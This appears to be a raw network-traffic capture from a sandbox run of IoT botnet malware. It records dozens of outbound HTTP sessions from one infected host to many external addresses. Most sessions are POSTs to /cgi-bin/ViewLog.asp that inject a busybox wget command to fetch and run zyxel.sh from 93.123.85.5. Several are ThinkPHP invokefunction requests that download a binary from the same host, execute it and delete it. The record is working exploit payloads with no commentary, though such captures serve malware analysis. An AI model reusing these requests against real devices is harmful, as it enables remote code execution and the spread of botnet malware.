                                                              Date: Mon, 13 Nov 2023 21:15:07 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              493192.168.2.233865694.121.27.2458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.104909897 CET10037OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              494192.168.2.233894895.100.57.15180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.287658930 CET10049OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:21.592828035 CET10057INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:21 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:21 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 36 31 35 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 36 31 26 23 34 36 3b 31 36 33 64 65 35 36 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c161502&#46;1699910361&#46;163de56d</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              495192.168.2.233549495.169.189.4980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.300184011 CET10052OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:21.622329950 CET10058INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:21 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              496192.168.2.235012094.120.99.2508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.445940018 CET10054OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              497192.168.2.234588494.122.79.608080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.446134090 CET10055OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              498192.168.2.235004095.86.100.24480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.647145987 CET10059OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              499192.168.2.234555885.88.170.548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:21.877120018 CET10144OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.308578968 CET10178INHTTP/1.1 405 Not Allowed
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:19:20 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 155
                                                              Connection: keep-alive
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              5192.168.2.235907695.174.114.898080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.723391056 CET391OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              50192.168.2.236025031.136.77.918080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.649141073 CET2101OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.651185036 CET2240OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:19.634927034 CET2466OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:23.570458889 CET2947OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.505502939 CET3967OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.375366926 CET5875OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.139064074 CET9915OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              500192.168.2.234730285.31.63.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.077934027 CET10157OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              501192.168.2.235121294.122.26.1448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.106537104 CET10159OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              502192.168.2.234343694.187.105.1588080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.110167027 CET10160OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              503192.168.2.235675294.122.232.328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.111886978 CET10160OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              504192.168.2.233553494.123.185.2368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.112538099 CET10161OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              505192.168.2.235949862.53.207.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.619260073 CET10183OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.929631948 CET10249INHTTP/1.1 404 Not Found
                                                              Server: nPerf/2.2.7 2022-10-14
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 3c 2f 70 3e 3c 70 3e 6e 50 65 72 66 53 65 72 76 65 72 20 76 32 2e 32 2e 37 20 32 30 32 32 2d 31 30 2d 31 34 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.<br /></p><p>nPerfServer v2.2.7 2022-10-14</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              506192.168.2.235829431.136.148.2218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:22.635683060 CET10184OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:23.626574993 CET10307OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:25.610441923 CET10521OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
